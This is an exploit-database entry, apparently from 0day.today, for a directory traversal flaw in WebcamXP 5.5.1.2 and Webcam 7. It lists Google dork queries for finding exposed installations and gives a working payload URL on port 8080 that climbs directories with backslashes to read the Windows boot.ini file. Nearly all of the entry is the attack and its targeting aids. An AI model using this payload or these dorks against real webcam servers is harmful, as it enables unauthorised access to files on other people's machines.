WebcamXP and Webcam 7 Directory Traversal Vulnerability

2012-02-22T00:00:00
ID 1337DAY-ID-17561
Type zdt
Reporter Silent_Dream
Modified 2012-02-22T00:00:00

Description

Exploit for windows platform in category web applications

                                        
                                            # Exploit Title: WebcamXP and Webcam7 Directory Traversal Vulnerability
# Google Dork: "powered by webcamxp" xhtml css
# Google Dork: "powered by webcam 7"
# Date: 2/22/2012
# Author: Silent Dream
# Software Link: http://dl.filekicker.com/send/file/230775-FQAC/wlite550.exe
# Software Link: http://dl.filekicker.com/send/file/226161-G6BD/w7inst.exe
# Version: WebcamXP 5.5.1.2, Webcam 7 v0.9.9.32
# Tested on: Windows XP
# Similar to CVE: 2008-5862 but uses backslashes instead of encoded forward slashes.
http://ip:8080/..\..\..\..\..\..\..\..\..\..\..\boot.ini



#  0day.today [2018-02-06]  #